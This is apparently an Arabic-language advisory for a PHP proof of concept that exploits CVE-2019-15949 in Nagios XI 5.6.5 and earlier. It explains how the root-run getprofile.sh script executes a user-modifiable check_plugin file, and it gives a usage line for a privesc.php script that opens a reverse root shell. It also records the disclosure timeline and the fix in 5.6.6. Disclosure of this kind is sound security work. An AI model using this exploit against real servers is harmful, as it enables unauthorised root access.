
POC يستغل ثغرة في Nagios XI (5.6.5) لتوليد شِل بصلاحيات الجذر.
توجد ثغرة أمنية في Nagios XI <= 5.6.5 تتيح للمهاجم استغلال RCE لرفع الامتيازات إلى صلاحيات root.
يتطلب الاستغلال الوصول إلى الخادم كمستخدم 'nagios'، أو الوصول إلى CCM عبر واجهة الويب مع صلاحيات لإدارة الإضافات.
يتم تنفيذ السكربت getprofile.sh، الذي يُستدعى عن طريق تنزيل ملف تعريف النظام (profile.php?cmd=download)، بصلاحيات root عبر إدخال sudo بدون كلمة مرور؛ وينفّذ السكربت الملف التنفيذي ‘check_plugin’ المملوك لمستخدم nagios.
يمكن لمستخدم مسجّل الدخول إلى Nagios XI بصلاحيات تعديل الإضافات، أو مستخدم 'nagios' على الخادم، تعديل الملف التنفيذي ‘check_plugin’ وإدراج أوامر خبيثة قابلة للتنفيذ بصلاحيات root.
تم تطوير إثبات مفهوم (POC) بلغة PHP يرفع حمولة (payload) تؤدي إلى الحصول على شل عكسي بصلاحيات root.
الاستخدام:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
تم الإبلاغ إلى Nagios في: 29 يوليو 2019
تم التأكيد من قبل Nagios في: 29 يوليو 2019
تم الإصلاح في الإصدار: 5.6.6 في: 20 أغسطس 2019
تم تعيين CVE في: 6 سبتمبر 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
